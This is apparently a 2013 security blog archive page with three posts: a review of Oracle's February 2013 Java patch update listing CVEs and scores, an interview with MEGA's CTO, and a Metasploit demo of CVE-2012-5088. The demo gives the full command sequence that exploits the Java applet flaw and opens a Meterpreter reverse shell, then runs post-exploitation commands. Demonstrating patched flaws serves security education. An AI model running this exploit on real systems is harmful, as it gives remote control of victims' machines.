Yearly Archives: 2013

Oracle Java Critical Patch Update February 2013 Review

Oracle has released its Java Critical Patch Update (CPU) for February 2013 on Friday, February 1. The release was initially planned for 19 February, but Oracle pushed the update out earlier because one of the critical vulnerabilities is being actively exploited in the wild. Of the 50 security vulnerabilities fixed in this CPU, 49 may be remotely exploitable. The highest CVSS base score for vulnerabilities in this CPU is 10.0, and 34 vulnerabilities have a CVSS base score greater than or equal to 7.0.

It is currently not clear which of these vulnerabilities is exploited in the wild, but it could be related to CVE-2013-1489, a publicly reported issue regarding the Java SE 7 security features introduced in Java SE 7 Update 10.

As you may know, Oracle uses CVSS 2.0 (Common Vulnerability Scoring System) to score reported vulnerabilities. But as you may also know, security researchers disagree with the way Oracle uses CVSS: Oracle plays with the CVSS score by creating a “Partial+” impact rating that does not exist in CVSS 2.0, and by interpreting the “Complete” rating differently from its CVSS 2.0 definition.

Affected products are:

  • JDK and JRE 7 Update 11 and earlier
  • JDK and JRE 6 Update 38 and earlier
  • JDK and JRE 5.0 Update 38 and earlier
  • SDK and JRE 1.4.2_40 and earlier
  • JavaFX 2.2.4 and earlier

CVE-2012-1541, CVE-2012-3213, CVE-2012-3342, CVE-2012-4301, CVE-2013-0425, CVE-2013-0426, CVE-2013-0428, CVE-2013-0436, CVE-2013-0437, CVE-2013-0439, CVE-2013-0441, CVE-2013-0442, CVE-2013-0445, CVE-2013-0446, CVE-2013-0447, CVE-2013-0450, CVE-2013-1472, CVE-2013-1475, CVE-2013-1476, CVE-2013-1477, CVE-2013-1478, CVE-2013-1479, CVE-2013-1480, CVE-2013-1481, CVE-2013-1482 and CVE-2013-1483 have a CVSS base score of 10.0.

CVE-2012-4305 and CVE-2013-1474 have a CVSS base score of 9.3.

CVE-2012-1543, CVE-2013-0419, CVE-2013-0423, CVE-2013-0429 and CVE-2013-0444 have a CVSS base score of 7.6.

CVE-2013-0351 has a CVSS base score of 7.5.

CVE-2013-0430 has a CVSS base score of 6.9.

CVE-2013-0432 has a CVSS base score of 6.4.

CVE-2013-0409, CVE-2013-0424, CVE-2013-0427, CVE-2013-0431, CVE-2013-0433, CVE-2013-0434, CVE-2013-0435, CVE-2013-0440, CVE-2013-0448, CVE-2013-0449 and CVE-2013-1473 have a CVSS base score of 5.0.

CVE-2013-0438 has a CVSS base score of 4.3.

CVE-2013-0443 has a CVSS base score of 4.0.

CVE-2013-1489 has a CVSS base score of 0.0.

Interview of Mathias Ortmann MEGA CTO

I had the chance to interview Mathias Ortmann, co-founder and Chief Technology Officer (CTO) of MEGA, through Xavier Buck, a Luxembourgish entrepreneur. Mathias Ortmann reviews the launch of MEGA, the secure cloud-based file sharing platform.

How did you start the MEGA adventure?

When we learned that our extradition proceedings would be delayed by the US government appealing against the high court’s decision that we are allowed to see evidence, we knew that we would be in for a long and costly legal battle. The only way to finance it is to make money, and since we have some expertise in the field of cloud storage, we decided to go down that path.

The MEGA buzz has generated a lot of cyber attacks. Did you expect it?

Cyber attacks in the sense of denial-of-service or hacking attempts – not yet.
Cyber attacks in the sense of massive user demand – oh yes!

What do you think regarding the encryption polemic?

We are a bit disappointed by statements like “If you can break SSL, you can break MEGA” and the uninformed discussion about our de-duplication strategy. However, there is also a positive side – so far, two genuine vulnerabilities have been found, reported to us and fixed: A crypto-unrelated XSS issue and a basic design flaw in our static content verification process. We are still undecided on the issue of whether we should protect users that choose unsafe passwords or rather educate them better so that they don’t.

You host some servers in the USA; should you worry?

Despite the WHOIS result, we have no servers in the US (or Africa).

MEGA proposes secure cloud storage as a service. What countermeasures are in place to protect copyrights?

Copyrights are not affected by encryption. Whether or not the data is encrypted, policing all user files for copyrighted content is neither required nor permitted, and we enforce a takedown policy that complies with all applicable laws and works just fine despite the encryption.

Why is MEGA the best?

Are we the best? We leave that up to the market to decide. We believe that our product – the combination of privacy, convenience, performance and pricing – is an attractive one, and we hope that it will be accepted and become popular despite our legal fight and the negative crypto-related PR that erupted immediately after our launch. To use the weather as an analogy (MEGA vs. the market leaders): We believe that a few dissipating clouds in a blue sky are still better than standing in the rain all the time!

CVE-2012-5088 Java Applet Method Handle RCE Metasploit Demo

Timeline :

Vulnerability patched by Oracle in the October 2012 CPU
Metasploit PoC provided on 2013-01-22

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2012-5088
OSVDB-86352
BID-56057
Oracle October 2012 CPU
New Java Modules in Metasploit… No 0 days this time

Affected version(s) :

Oracle Java version 7 Update 7 and earlier.

Tested on Windows 8 Pro with :

Internet Explorer 10
Oracle Java 7 Update 7

Description :

This module abuses the Method Handle class from a Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability affects Java version 7u7 and earlier.

Commands :

use exploit/multi/browser/java_jre17_method_handle
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo